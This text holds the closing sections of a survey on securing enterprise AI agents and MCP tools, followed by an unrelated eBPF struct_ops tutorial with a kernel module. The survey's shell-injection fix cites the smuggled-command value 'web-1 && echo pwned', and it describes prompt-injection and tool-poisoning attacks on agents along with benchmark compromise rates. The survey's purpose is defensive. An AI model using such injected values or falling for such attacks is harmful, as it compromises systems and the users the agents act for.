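The shell-injection pattern behind the first two advisories has a well-known remedy: validate the input and pass arguments as a list so that no shell ever parses them. The sketch below is not the patched code from either project; the function names are hypothetical and the pod-name pattern is a simplifying assumption.

```python
import re
import subprocess
import sys

# Assumed pattern for pod names: lowercase alphanumerics, "-" and ".".
POD_NAME = re.compile(r"^[a-z0-9]([-a-z0-9.]*[a-z0-9])?$")


def build_logs_argv(pod):
    """Build an argument vector for reading pod logs.

    The unsafe variant would be a string such as f"kubectl logs {pod}"
    handed to a shell, where ";", "|" or "&&" in `pod` start new commands.
    """
    if not POD_NAME.fullmatch(pod):
        raise ValueError(f"invalid pod name: {pod!r}")
    return ["kubectl", "logs", pod]


def run_argv(argv):
    """Run a command without a shell; metacharacters stay literal text."""
    completed = subprocess.run(argv, shell=False, capture_output=True,
                               text=True, check=True)
    return completed.stdout
```

With `shell=False`, a payload like `web-1 && echo pwned` reaches the program as a single argument instead of being interpreted, so the validation step is a second layer of defense and not the only one.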

These incidents highlight supply chain risk: when you install an MCP server via npm or pip, do you know it's safe? Could it have a dependency hijacked to steal data? Traditional supply chain best practices – code signing, vetting maintainers, vulnerability scanning – all apply here. But additionally, the dynamic nature of agent tool use requires new thinking. For example, an agent might fetch a tool definition (schema) from somewhere at runtime – that channel could be compromised (a malicious tool listing that lies about what it does). To address this, the community is discussing tool registries with verification. Imagine an "App Store" for MCP tools where each tool is reviewed, sandboxed, and cryptographically signed. The Linux Foundation AAIF might play a role in hosting a global registry, or there may be vendor-specific ones.

Some researchers call for transparency logs and an "SBOM" (Software Bill of Materials) approach for agent tools. For instance, an enterprise might want a log of every tool version the agent ever used, so if one is later found malicious they can audit past agent runs. They also want assurance that the tool code running is exactly the code that was audited. This is akin to how modern browsers handle extensions: with strict signing and review processes.

On the defense side, one idea is dynamic tool vetting – before an agent uses a new tool, run that tool in a test mode on known benign inputs to see if it behaves correctly, or run it in a shadow sandbox with instrumented monitoring to detect unexpected actions. This is analogous to how app stores do a review, but potentially automated and at runtime. For now, this is an open research problem; we haven't seen full implementations yet, but it's identified in literature as a needed control.

In summary, securing the tool ecosystem requires both preventive measures (secure coding practices for tool developers, automated scans for dangerous patterns like execSync on inputs) and mitigations (running tools with least privilege, e.g. a tool that only needs to read a database should not also have OS write access). The principle of least privilege should apply at every level: the agent only has access to certain tools, the tool only has access to certain system resources. Achieving this in practice means plumbing through the user's identity and intent: e.g., if an agent is acting on behalf of Alice, the database tool should run under Alice's credentials or a role with her permissions, not a superuser. This is an area where enterprise IAM (Identity and Access Management) integration is critical – mapping the human user's identity to the agent's allowed actions. Recent work is exploring how to tie enterprise SSO/OAuth tokens into agent sessions in a fine-grained way, so that an agent cannot escalate its privileges beyond what the user would normally have through regular apps.

4.3 Monitoring, Auditing, and Policy Enforcement

Observability is notoriously difficult for AI systems because of their nondeterminism and unstructured outputs. But for agents, observability is non-negotiable in enterprise settings. Operators need to be able to ask: "What sequence of steps did the agent take? Why did it take a certain action? What tool calls were made with what parameters? Did anything unusual happen?" To that end, agent platforms are incorporating extensive logging and tracing capabilities:

Structured Traces: There's a push to use standards like OpenTelemetry to trace agent execution like any microservice call graph. Each agent action (e.g. "called Tool X with params Y, got result Z") can be a span in a trace. This allows using existing APM (Application Performance Monitoring) tools to visualize agent workflows. Some commercial platforms now show a real-time step-by-step trace of the agent's reasoning and tool use (often known as an "Agent console" or debug pane).
Semantic Logging: Beyond raw tool call logs, there's interest in capturing higher-level events. For example, flag if an agent's plan changed drastically mid-execution (could indicate it got confused or was manipulated), or if it requested an unusually large amount of data from a tool. Logging the content of prompts and responses is tricky (for privacy reasons), but logging the intents and outcomes is feasible. Additionally, cryptographic logging (hash chaining the logs) has been suggested so that forensic analysis can trust that logs weren't tampered with.
Auditing for Compliance: In sectors like finance or healthcare, any automated system needs audit trails for compliance. If an agent made a change to a customer's record, we need to know who/what prompted that and that it was authorized. Solutions here include linking agent actions to a user session and storing that context (e.g. "Agent acted on behalf of Alice, in response to request R, at time T"). Some enterprises restrict certain tools to manual-confirmation mode where a human must approve the agent's action in a dashboard (common for things like executing a trade or sending an email). Ensuring the agent properly presents the action for approval (and doesn't hide the true intent) is an active UX/security challenge.
Policy Engines: Enterprises are beginning to employ policy-as-code systems (like Open Policy Agent or custom rule engines) to govern agent behavior. For example, a policy might be: "Agents cannot call the production database tool with a query that lacks a LIMIT clause, unless the user is in admin role." When an agent attempts such a query, the policy engine can intercept and either block it or route it for approval. This ties into MCP Gateway architectures, where instead of the agent connecting directly to tool servers, it connects to a Gateway proxy that mediates all calls. Microsoft's preview of an MCP Gateway shows features like session persistence (to keep agent-tool sessions sticky) and a central place to enforce auth, rate limiting, etc. We can foresee these gateways becoming very sophisticated, implementing org-wide guardrails (e.g. no agent can call external web APIs that are not in a vetted list, to prevent data exfiltration).
Evaluation and Testing: An emerging practice is to treat agents like code and develop evaluation suites for them. Before deploying an agent update (new model version or new tool), run a battery of scenarios (some normal, some adversarial) to see how it behaves. In late 2025, multiple benchmarks for agent safety were released to facilitate this. The MCP-SafetyBench is one such benchmark: it tests LLM agents on realistic multi-step tasks across five domains (web browsing, financial analysis, code repo management, navigation, and web search) while injecting 20 types of attacks (from prompt tampering to tool output manipulation). The sobering result: no current model is remotely immune to MCP-based attacks – even top-tier models had 30–48% of tasks compromised. They also found a negative correlation between task performance and security: models that are more capable at completing tasks also tend to be more exploitable, presumably because they more eagerly follow any instruction including malicious ones. This points to a fundamental safety-utility trade-off. Enterprises must calibrate how "aggressive" or autonomous they want the agent to be. Some are introducing adjustable risk settings – e.g. a slider from conservative (fewer tools, more confirmations) to aggressive (full autonomy, high risk). A metric called NRP (Normalized Risk-Performance) was proposed to quantify this balance. Ultimately, continuous evaluation will be key: as new attacks are discovered, adding them to test suites and ensuring the agent (with all its tools and policies) can handle or resist them.
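The hash-chained logging suggested under Semantic Logging is simple to sketch: each entry's hash covers the previous entry's hash, so editing any earlier record breaks every later link. The entry layout and function names below are hypothetical.

```python
import hashlib
import json

GENESIS = "0" * 64  # placeholder "previous hash" for the first entry


def _digest(prev_hash, event):
    # Canonical JSON so the same event always hashes to the same value.
    body = json.dumps(event, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode("utf-8")).hexdigest()


def append_entry(log, event):
    """Append `event` to `log`, linking it to the previous entry's hash."""
    prev_hash = log[-1]["hash"] if log else GENESIS
    log.append({"event": event, "prev": prev_hash,
                "hash": _digest(prev_hash, event)})


def verify(log):
    """Recompute the chain; False means some entry was altered or reordered."""
    prev_hash = GENESIS
    for entry in log:
        if entry["prev"] != prev_hash:
            return False
        if entry["hash"] != _digest(prev_hash, entry["event"]):
            return False
        prev_hash = entry["hash"]
    return True
```

On its own the chain does not detect truncation of the most recent entries or a wholesale rewrite, so the latest hash would also need to be stored or signed somewhere the agent cannot reach.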

4.4 Identity, Authentication, and Governance

A less glamorous but absolutely crucial aspect is identity and access management (IAM) for agents. When an agent performs an action, whose authority is it under? In a multi-user environment (say an AI assistant in a company), the agent might have to act as different users at different times. Traditional OAuth wasn't designed for a scenario where an LLM is effectively a headless client acting interactively on behalf of a user. Over the past months, developers have hit practical snags integrating OAuth with MCP. For example, the OAuth Dynamic Client Registration used by MCP (so an agent can automatically register itself to use an API) sometimes fails with enterprise IdPs due to strict URL checks. Some IdPs don't allow dynamic clients at all. There are calls to allow static client credentials or out-of-band provisioning for agents in such cases. This is more of a standards gap than a research one – it's being worked through in the MCP working group.

From an enterprise architecture view, many want the agent to integrate with existing SSO. That means when an employee invokes an agent, the agent should use that employee's OAuth token to access tools. This ensures all actions are attributable and within the user's permissions. It's straightforward for some tools (an MCP server can simply require a token from the agent), but complex for others (e.g. a shell tool on a server – how to scope that per user?). Some solutions involve impersonation tokens or scoped API keys: e.g. the agent might have a key that only allows certain operations and is tagged to the user.

The concept of "least privilege" comes into sharp focus here: the agent should only have the minimum access needed for the task, and ideally only for the duration needed. Techniques like OAuth token exchange or short-lived credentials are recommended. If an agent is spun up to do a build job, give it a temporary token that expires when the job ends, so even if it went rogue, it couldn't do damage later. One recent architecture paper emphasizes integrating enterprise identity with these agents so that all actions flow through the normal IAM checks and logs of the enterprise. That means, for instance, an agent using a Jira tool would appear in the Jira audit logs as "actions performed via AI agent on behalf of Bob". This transparency is needed for trust – people won't use the agent if it's a black box doing things in the shadows.
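The short-lived, scoped credential idea can be sketched with a small HMAC-signed token. This is a stand-in for illustration, not OAuth token exchange: in practice the enterprise identity provider would issue and validate the credential. The claim names, scope strings, and function names are hypothetical.

```python
import base64
import hashlib
import hmac
import json
import time


def issue_token(secret, user, scopes, ttl_seconds, now=None):
    """Issue a signed token naming the user, allowed scopes, and expiry."""
    now = time.time() if now is None else now
    claims = {"sub": user, "scopes": sorted(scopes), "exp": now + ttl_seconds}
    payload = base64.urlsafe_b64encode(
        json.dumps(claims, sort_keys=True).encode("utf-8")).decode("ascii")
    signature = hmac.new(secret, payload.encode("ascii"),
                         hashlib.sha256).hexdigest()
    return payload + "." + signature


def check_token(secret, token, required_scope, now=None):
    """Return the user if the token is authentic, unexpired, and in scope."""
    now = time.time() if now is None else now
    payload, sep, signature = token.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(secret, payload.encode("utf-8"),
                        hashlib.sha256).hexdigest()
    if not hmac.compare_digest(signature.encode("utf-8"),
                               expected.encode("utf-8")):
        return None
    claims = json.loads(base64.urlsafe_b64decode(payload))
    if now >= claims["exp"] or required_scope not in claims["scopes"]:
        return None
    return claims["sub"]
```

Because the token carries the user's identity, a tool that accepts it can record "on behalf of Bob" in its own audit log, and the expiry bounds how long a compromised agent could keep acting.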

Governance also extends to deciding which tasks to automate vs require human approval, what data agents are allowed to see, and how to prevent data leakage. Some enterprises restrict agents from accessing production data entirely, using them only on sanitized or test datasets until trust is built. Others put heavy monitoring on outputs (e.g. scanning everything the agent is about to output to a user for sensitive data). These are areas where data loss prevention (DLP) tools intersect with AI. A future vision is that an enterprise agent platform will integrate DLP classifiers that flag if an agent's response likely contains company confidential info, and either redact it or alert a human.

Finally, we must mention user trust and adoption: beyond technical measures, building trust in agents involves user education and incremental rollout. Many organizations start with "read-only" agents (they can suggest actions but not execute them) and then gradually allow more autonomy as confidence grows. By having robust logs and a clear override path, users are more likely to accept the agent's help. Trust is also enhanced by making the agent's reasoning visible (hence the popularity of chain-of-thought traces displayed to users) and by giving users easy ways to correct or stop the agent. In essence, transparency and control are the antidotes to the unpredictability of AI.

The advancements in the last half-year – from sandbox isolation to protocol standardization and new benchmarks – all aim to shrink the trust gap. Yet, open challenges remain (discussed in the next section) before one can confidently say an autonomous agent is as well-understood and controlled as a traditional software microservice.

5. Open Challenges and Future Directions

Despite rapid progress, enterprise agent systems still have unsolved research questions and practical gaps. We conclude by highlighting some of the most pressing ones, as identified by recent discussions and publications, which represent opportunities for future work:

Unified Cross-Layer Security Model: Today we have pieces – OAuth for identity, MCP scopes for tool access, sandbox for OS isolation – but they don't always speak the same language. There is no single policy that says, for example, "User X's agent can read from database Y but not write, and can run code but only use 2 CPU and no internet, and these conditions are cryptographically verified." A comprehensive model that ties user identity, agent capabilities, tool permissions, and sandbox OS permissions into one coherent framework is needed. Early proposals like AgentBound (inspired by mobile app permissions) are a start. In the future, we might see capability tokens that encode all these at once – the agent carries a token which the sandbox and tools all check, limiting what it can do in each context. Formal verification of such models (to prove an agent cannot do X) would greatly enhance trust.
Rollback of External Side Effects: As noted, while we can roll back filesystem changes in a sandbox, we cannot yet roll back an email sent or a transaction made. Developing agent transaction protocols or sagas is an open challenge. One idea is to require critical tools to provide a compensation function – e.g. an MCP server for cloud VMs could have an "undo" for creating a VM (which would delete it). An agent planner could then use these to revert a series of actions if needed. This also ties into training the LLM or using a secondary verifier to decide when to roll back (e.g. if it notices an outcome diverges from expected state). Without solving this, enterprises will be hesitant to let agents perform irreversible operations autonomously.
Advanced Threat Defenses: The taxonomy of potential attacks (context injection, tool poisoning, cross-tool data leaks, etc.) is growing. Defenses like context signing (cryptographically signing tool outputs or important prompts to prevent tampering) have been suggested but not widely implemented. The idea there is: an agent would only trust tool outputs that come with a signature or hash, so an attacker who intercepts or modifies the content (like a man-in-the-middle on an HTTP tool) would fail. Similarly, isolating tools from each other (so one tool can't directly influence another except through the agent's vetted reasoning) is a challenge – currently the agent's memory is the meeting point of all tool data, making it a melting pot where a malicious output in one tool can affect decisions involving another.
Benchmarking and Standards for Evaluation: The community has started benchmarks like MCP-SafetyBench and MSB, but we need continuous evaluation pipelines. One option is an open leaderboard where agent developers can submit their agent (with a certain set of tools and policies) to be evaluated against a suite of scenarios, similar to how language models are benchmarked on GLUE or SuperGLUE for NLP. This could drive competition and improvement in safety. Evaluation should also include cost and latency metrics: an agent that is safe but takes hours or runs up a large bill to complete a task isn't practical. Balancing efficiency with safety will likely lead to innovations like adaptive risk modes (the agent switches to a more cautious approach if it senses something sensitive, trading speed for safety dynamically).
Human-Agent Interaction Paradigms: AgentBay's approach to HITL is one example of making agents more usable in the real world. There is still work to do on when and how an agent should ask for help. If it asks too often, it's not useful; if it asks too rarely, it might make an irrecoverable error. Finding that sweet spot (perhaps through reinforcement learning or feedback from users) is an ongoing area. Also, UI/UX research into how to present agent decisions to users in a clear way will be important (so users can confidently approve or deny actions). In enterprises, this might mean integrating agent controls into existing interfaces – e.g. showing an "AI agent suggestion" in a Jira ticket with a one-click approve.
Cross-Organization Collaboration and Data Sharing: Enterprise agents often need to work across silos – e.g. an agent might coordinate between a supplier's system and the company's internal system. This raises questions of federated trust: how do you let an agent use two domains' tools in a secure way? This touches on things like standardizing how agents convey identity across org boundaries, and how audit logs are shared. The AAIF being under Linux Foundation hints at future inter-company standards to address this, since agents won't stop at the corporate firewall.
Ethical and Compliance Considerations: Beyond security, enterprises must ensure agents comply with regulations and ethical norms. For example, if an agent interacts with personal data, privacy laws apply. How do we audit that an agent didn't retain or leak personal data beyond allowed purposes? Techniques like data tagging and tracking could be employed – marking certain outputs as containing sensitive info and preventing them from being used in contexts that aren't allowed. Ensuring AI explanations for decisions (especially if used in regulated domains) is another angle – if an agent makes a decision that affects a customer, one might need a rationale logged for compliance, which is tricky given the opaque reasoning of LLMs.
Improving Model Robustness: Finally, at the heart is the LLM itself. There's ongoing research into fine-tuning models to be more resistant to manipulation (advantageous to safety but often at odds with capability). Techniques like constitutional AI or adversarial training on tool-use scenarios might yield models that inherently refuse certain dangerous actions or at least flag uncertainty. Also, specialized models for parsing and validating the agent's outputs (e.g. a secondary model that checks if a proposed action seems safe/rational) could be integrated. OpenAI and others are exploring "moderator" models that look at the main model's outputs. In agents, a "policy model" might examine the plan and tool uses and raise red flags for anything that violates training-time learned safe patterns.
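The compensation-function idea from the rollback item above can be made concrete with a small sketch. This is only an illustration under stated assumptions: the names saga_record, saga_rollback, and undo_create_vm are hypothetical, and "deleting a VM" is modeled as decrementing a counter rather than calling any real tool or MCP server.

```c
#include <stddef.h>

#define SAGA_MAX_STEPS 16

/* A compensation undoes one completed action; ctx is action-specific state. */
typedef void (*compensate_fn)(void *ctx);

/* Hypothetical log of compensations for the actions an agent has performed. */
struct saga {
    compensate_fn undo[SAGA_MAX_STEPS];
    void *ctx[SAGA_MAX_STEPS];
    size_t count;
};

/* Record the undo for an action that has already succeeded. */
int saga_record(struct saga *s, compensate_fn undo, void *ctx)
{
    if (s->count >= SAGA_MAX_STEPS)
        return -1; /* log is full */
    s->undo[s->count] = undo;
    s->ctx[s->count] = ctx;
    s->count++;
    return 0;
}

/* Run compensations newest-first, leaving the log empty. */
void saga_rollback(struct saga *s)
{
    while (s->count > 0) {
        s->count--;
        s->undo[s->count](s->ctx[s->count]);
    }
}

/* Example compensation: "delete the VM", modeled as decrementing a counter. */
void undo_create_vm(void *ctx)
{
    int *vm_count = ctx;

    (*vm_count)--;
}
```

A planner would call saga_record after each successful tool call and saga_rollback when a verifier decides the outcome has diverged. Actions with no meaningful compensation (a sent email, for instance) cannot be expressed this way, which is exactly the open problem described above.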

Outlook: The next year will likely bring a maturation of the agent ecosystem akin to what 2010-2015 saw for cloud microservices – an explosion of tools and best practices to handle deployment, security, monitoring, and standardization. The formation of AAIF is a strong indicator that industry players see collaboration as the way forward; no one wants a fragmented, Wild West environment when so much is at stake (both in terms of safety and potential business value). We will probably see AgentOps teams emerge in organizations, analogous to MLOps, focused on managing and supervising fleets of agents. They'll use dashboards (like GitHub's Agent HQ mission control) to oversee agent activities across the enterprise. And just as DevOps developed guardrails and CI/CD for code, AgentOps will develop guardrails and continuous evaluation for autonomous AI behaviors.

In conclusion, enterprise agent systems are transitioning from the lab to the real world, carrying with them both excitement (unprecedented automation capabilities) and caution (novel failure modes). Sandbox architectures and protocols like MCP have laid a foundation that makes these systems more modular, controllable, and interoperable than before. Yet, achieving a level of trust comparable to traditional software will require continued innovation in permission modeling, verification, and human oversight integration. The last half-year's progress has been remarkable – what was mostly sci-fi a year ago (multiple AIs collaborating on complex tasks with minimal human input) is now demonstrably feasible. The coming months will likely see pilots turn into production deployments in enterprises, each teaching new lessons. By actively sharing these lessons and converging on open standards and benchmarks, the community can accelerate the safe adoption of agentic AI. The end goal is an ecosystem where AI agents become reliable teammates – tirelessly automating drudgery and navigating complexity – while humans retain ultimate control and understanding of their behavior. The path to get there is challenging, but as this survey shows, the groundwork is rapidly being put in place.

References

Open-Source Agent Sandbox Enables Secure Deployment of AI Agents on Kubernetes - InfoQ News on Agent Sandbox, gVisor/Kata isolation, CRD for stateful agents, OWASP Top 10 for AI Agents
Google launches Agent Sandbox for secure AI agents on Kubernetes - TechInformed on gVisor isolation, pre-warmed pools (90% faster startups), Pod Snapshots
Linux Foundation Announces Formation of Agentic AI Foundation (AAIF) - MCP, Goose, AGENTS.md contributions; cross-industry support
MCP: The Universal Connector for Building Smarter, Modular AI Agents - InfoQ on MCP benefits (M×N to M+N integration, interoperability)
Introducing Microsoft Agent Framework - Microsoft Foundry Blog on open standards (MCP, A2A, OpenAPI) and enterprise readiness
What's new in Microsoft Foundry (Oct/Nov 2025) - Microsoft Agent Framework updates
GitHub launches Agent HQ for AI-powered coding - InfoWorld on managing multiple coding agents with governance, audit, and mission control
CVE-2025-53355: mcp-server-kubernetes command injection vulnerability - GitHub Advisory on unsanitized execSync and prompt-injection exploit via pod logs
Securing AI Agent Execution (arXiv:2510.21236) - Bühler et al. 2025: AgentBound permission framework for MCP tools, auto-policy generation (~80% accuracy)
AgentBay: A Hybrid Interaction Sandbox (arXiv:2512.04367) - Piao et al. 2025: unified sandbox with AI API control + live human takeover (48% higher task success with HITL)
MCP-SafetyBench (OpenReview) - Lan et al. 2025: real MCP server benchmark, 30–48% attack success on tested LLMs
MCP Attacks: Threats, Taxonomy, and Defenses - Adnan Masood on threat taxonomy for tool-using LLMs

eBPF Tutorial: Extending Kernel Subsystems with BPF struct_ops

云微 — Tue, 27 Jan 2026 07:20:44 +0000

Have you ever wanted to extend kernel behavior—like adding a custom scheduler, network protocol, or security policy—but were put off by the complexity of writing and maintaining a full kernel module? What if you could define the logic directly in eBPF, with dynamic updates, safe execution, and programmable control, all without recompiling the kernel or risking system stability?

This is the power of BPF struct_ops. This advanced eBPF feature allows BPF programs to implement the callbacks of a kernel operations structure, effectively letting you "plug in" custom logic to extend kernel subsystems. It goes beyond simple tracing or filtering—you can now implement core kernel operations in BPF. For example, we use it to implement GPU scheduling and memory offloading extensions in GPU drivers (see LPC 2024 talk and gpu_ext project).

In this tutorial, we will explore how to use struct_ops to dynamically extend kernel subsystem behavior. We won't be using the common TCP congestion control example. Instead, we'll take a more fundamental approach that mirrors the extensibility seen with kfuncs. We will create a custom kernel module that defines a new, simple subsystem with a set of operations. This module will act as a placeholder, creating new attachment points for our BPF programs. Then, we will write a BPF program to implement the logic for these operations. This demonstrates a powerful pattern: using a minimal kernel module to expose a struct_ops interface, and then using BPF to provide the full, complex implementation.

The complete source code for this tutorial can be found here: https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/struct_ops

Introduction to BPF struct_ops: Programmable Kernel Subsystems

The Challenge: Extending Kernel Behavior Safely and Dynamically

Traditionally, adding new functionality to the Linux kernel, such as a new file system, a network protocol, or a scheduler algorithm, requires writing a kernel module. While powerful, kernel modules come with significant challenges:

Complexity: Kernel development has a steep learning curve and requires a deep understanding of kernel internals.
Safety: A bug in a kernel module can easily crash the entire system. There are no sandboxing guarantees.
Maintenance: Kernel modules must be maintained and recompiled for different kernel versions, creating a tight coupling with the kernel's internal APIs.

eBPF has traditionally addressed these issues for tracing, networking, and security by providing a safe, sandboxed environment. However, most eBPF programs are attached to existing hooks (like tracepoints, kprobes, or XDP) and react to events. They don't typically implement the core logic of a kernel subsystem.

The Solution: Implementing Kernel Operations with BPF

BPF struct_ops bridges this gap. It allows a BPF program to implement the functions within a struct_ops—a common pattern in the kernel where a structure holds function pointers for a set of operations. Instead of these pointers pointing to functions compiled into the kernel or a module, they can point to BPF programs.

This is a paradigm shift. It's no longer just about observing or filtering; it's about implementing. Imagine a kernel subsystem that defines a set of operations like open, read, write. With struct_ops, you can write BPF programs that serve as the implementation for these very functions.
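To see the underlying pattern without any kernel code, here is a minimal userspace sketch of an operations table. Everything in it (demo_ops, demo_plug, the demo_call_* helpers) is a hypothetical analogue invented for illustration; in the real mechanism the slots are filled by BPF programs rather than ordinary C functions.

```c
#include <stddef.h>

/* Hypothetical userspace analogue of a kernel operations structure. */
struct demo_ops {
    int (*test_1)(void);
    int (*test_2)(int a, int b);
};

/* One possible implementation; with struct_ops, BPF programs play this role. */
static int impl_test_1(void) { return 42; }
static int impl_test_2(int a, int b) { return a + b; }

const struct demo_ops demo_impl = {
    .test_1 = impl_test_1,
    .test_2 = impl_test_2,
};

/* The "subsystem" only holds a pointer to whatever implementation is plugged in. */
static const struct demo_ops *active_ops;

void demo_plug(const struct demo_ops *ops)
{
    active_ops = ops;
}

/* Dispatch through the table; return -1 when no implementation fills the slot. */
int demo_call_test_1(void)
{
    if (active_ops && active_ops->test_1)
        return active_ops->test_1();
    return -1;
}

int demo_call_test_2(int a, int b)
{
    if (active_ops && active_ops->test_2)
        return active_ops->test_2(a, b);
    return -1;
}
```

The caller never knows which implementation sits behind the pointers, so swapping the table changes behavior without touching the dispatch code. That indirection is what struct_ops exposes to BPF.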

This approach is similar in spirit to how kfuncs allow developers to extend the capabilities of BPF. With kfuncs, we can add custom helper functions to the BPF runtime by defining them in a kernel module. With struct_ops, we take this a step further: we define a whole new set of attach points for BPF programs, effectively creating a custom, BPF-programmable subsystem within the kernel.

The benefits are immense:

Dynamic Implementation: You can load, update, and unload the BPF programs implementing the subsystem logic on the fly, without restarting the kernel or the application.
Safety: The BPF verifier ensures that the BPF programs are safe to run, preventing common pitfalls like infinite loops, out-of-bounds memory access, and system crashes.
Flexibility: The logic is in the BPF program, which can be developed and updated independently of the kernel module that defines the struct_ops interface.
Programmability: Userspace applications can interact with and control the BPF programs, allowing for dynamic configuration and control of the kernel subsystem's behavior.

In this tutorial, we will walk through a practical example of this pattern. We'll start with a kernel module that defines a new struct_ops type, and then we'll write a BPF program to implement its functions.

The Kernel Module: Defining the Subsystem Interface

The first step is to create a kernel module that defines our new BPF-programmable subsystem. This module doesn't need to contain much logic itself. Its primary role is to define a struct_ops type and register it with the kernel, creating a new attachment point for BPF programs. It also provides a mechanism to trigger the operations, which in our case will be a simple proc file.

This approach is powerful because it separates the interface definition (in the kernel module) from the implementation (in the BPF program). The kernel module is stable and minimal, while the complex, dynamic logic resides in the BPF program, which can be updated at any time.

Complete Kernel Module: `module/hello.c`

Here is the complete source code for our kernel module. It defines a struct_ops named bpf_testmod_ops with three distinct operations that our BPF program will later implement.

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/bpf.h>
#include <linux/btf.h>
#include <linux/btf_ids.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/bpf_verifier.h>

/* Define our custom struct_ops operations */
struct bpf_testmod_ops {
    int (*test_1)(void);
    int (*test_2)(int a, int b);
    int (*test_3)(const char *buf, int len);
};

/* Global instance that BPF programs will implement */
static struct bpf_testmod_ops __rcu *testmod_ops;

/* Proc file to trigger the struct_ops */
static struct proc_dir_entry *trigger_file;

/* CFI stub functions - required for struct_ops */
static int bpf_testmod_ops__test_1(void)
{
    return 0;
}

static int bpf_testmod_ops__test_2(int a, int b)
{
    return 0;
}

static int bpf_testmod_ops__test_3(const char *buf, int len)
{
    return 0;
}

/* CFI stubs structure */
static struct bpf_testmod_ops __bpf_ops_bpf_testmod_ops = {
    .test_1 = bpf_testmod_ops__test_1,
    .test_2 = bpf_testmod_ops__test_2,
    .test_3 = bpf_testmod_ops__test_3,
};

/* BTF and verifier callbacks */
static int bpf_testmod_ops_init(struct btf *btf)
{
    /* Initialize BTF if needed */
    return 0;
}

static bool bpf_testmod_ops_is_valid_access(int off, int size,
                        enum bpf_access_type type,
                        const struct bpf_prog *prog,
                        struct bpf_insn_access_aux *info)
{
    /* Allow all accesses for now */
    return true;
}

/* Allow specific BPF helpers to be used in struct_ops programs */
static const struct bpf_func_proto *
bpf_testmod_ops_get_func_proto(enum bpf_func_id func_id,
                   const struct bpf_prog *prog)
{
    /* Use base func proto which includes trace_printk and other basic helpers */
    return bpf_base_func_proto(func_id, prog);
}

static const struct bpf_verifier_ops bpf_testmod_verifier_ops = {
    .is_valid_access = bpf_testmod_ops_is_valid_access,
    .get_func_proto = bpf_testmod_ops_get_func_proto,
};

static int bpf_testmod_ops_init_member(const struct btf_type *t,
                       const struct btf_member *member,
                       void *kdata, const void *udata)
{
    /* No special member initialization needed */
    return 0;
}

/* Registration function */
static int bpf_testmod_ops_reg(void *kdata, struct bpf_link *link)
{
    struct bpf_testmod_ops *ops = kdata;

    /* Only one instance at a time */
    if (cmpxchg(&testmod_ops, NULL, ops) != NULL)
        return -EEXIST;

    pr_info("bpf_testmod_ops registered\n");
    return 0;
}

/* Unregistration function */
static void bpf_testmod_ops_unreg(void *kdata, struct bpf_link *link)
{
    struct bpf_testmod_ops *ops = kdata;

    if (cmpxchg(&testmod_ops, ops, NULL) != ops) {
        pr_warn("bpf_testmod_ops: unexpected unreg\n");
        return;
    }

    pr_info("bpf_testmod_ops unregistered\n");
}

/* Struct ops definition */
static struct bpf_struct_ops bpf_testmod_ops_struct_ops = {
    .verifier_ops = &bpf_testmod_verifier_ops,
    .init = bpf_testmod_ops_init,
    .init_member = bpf_testmod_ops_init_member,
    .reg = bpf_testmod_ops_reg,
    .unreg = bpf_testmod_ops_unreg,
    .cfi_stubs = &__bpf_ops_bpf_testmod_ops,
    .name = "bpf_testmod_ops",
    .owner = THIS_MODULE,
};

/* Proc file write handler to trigger struct_ops */
static ssize_t trigger_write(struct file *file, const char __user *buf,
                 size_t count, loff_t *pos)
{
    struct bpf_testmod_ops *ops;
    char kbuf[64];
    int ret = 0;

    if (count >= sizeof(kbuf))
        count = sizeof(kbuf) - 1;

    if (copy_from_user(kbuf, buf, count))
        return -EFAULT;

    kbuf[count] = '\0';

    rcu_read_lock();
    ops = rcu_dereference(testmod_ops);
    if (ops) {
        pr_info("Calling struct_ops callbacks:\n");

        if (ops->test_1) {
            ret = ops->test_1();
            pr_info("test_1() returned: %d\n", ret);
        }

        if (ops->test_2) {
            ret = ops->test_2(10, 20);
            pr_info("test_2(10, 20) returned: %d\n", ret);
        }

        if (ops->test_3) {
            ops->test_3(kbuf, count);
            pr_info("test_3() called with buffer\n");
        }
    } else {
        pr_info("No struct_ops registered\n");
    }
    rcu_read_unlock();

    return count;
}

static const struct proc_ops trigger_proc_ops = {
    .proc_write = trigger_write,
};

static int __init testmod_init(void)
{
    int ret;

    /* Register the struct_ops */
    ret = register_bpf_struct_ops(&bpf_testmod_ops_struct_ops, bpf_testmod_ops);
    if (ret) {
        pr_err("Failed to register struct_ops: %d\n", ret);
        return ret;
    }

    /* Create proc file for triggering */
    trigger_file = proc_create("bpf_testmod_trigger", 0222, NULL, &trigger_proc_ops);
    if (!trigger_file) {
        /* Note: No unregister function available in this kernel version */
        return -ENOMEM;
    }

    pr_info("bpf_testmod loaded with struct_ops support\n");
    return 0;
}

static void __exit testmod_exit(void)
{
    proc_remove(trigger_file);
    /* Note: struct_ops unregister happens automatically on module unload */
    pr_info("bpf_testmod unloaded\n");
}

module_init(testmod_init);
module_exit(testmod_exit);

MODULE_LICENSE("GPL");
MODULE_AUTHOR("eBPF Example");
MODULE_DESCRIPTION("BPF struct_ops test module");
MODULE_VERSION("1.0");

Understanding the Kernel Module Code

This module may seem complex, but its structure is logical and serves a clear purpose: to safely expose a new programmable interface to the BPF subsystem. Let's break it down.

First, we define the structure of our new operations. This is a simple C struct containing function pointers. This struct bpf_testmod_ops is the interface that our BPF program will implement. Each function pointer defines a "slot" that a BPF program can fill.

struct bpf_testmod_ops {
    int (*test_1)(void);
    int (*test_2)(int a, int b);
    int (*test_3)(const char *buf, int len);
};

Next, we have the core bpf_struct_ops definition. This is a special kernel structure that describes our new struct_ops type to the BPF system. It's the glue that connects our custom bpf_testmod_ops to the BPF infrastructure.

static struct bpf_struct_ops bpf_testmod_ops_struct_ops = {
    .verifier_ops = &bpf_testmod_verifier_ops,
    .init = bpf_testmod_ops_init,
    .init_member = bpf_testmod_ops_init_member,
    .reg = bpf_testmod_ops_reg,
    .unreg = bpf_testmod_ops_unreg,
    .cfi_stubs = &__bpf_ops_bpf_testmod_ops,
    .name = "bpf_testmod_ops",
    .owner = THIS_MODULE,
};

This structure is filled with callbacks that the kernel will use to manage our struct_ops:

.reg and .unreg: These are registration and unregistration callbacks. The kernel invokes .reg when a BPF program tries to attach an implementation for bpf_testmod_ops. Our implementation uses cmpxchg to ensure only one BPF program can be attached at a time. .unreg is called when the BPF program is detached.
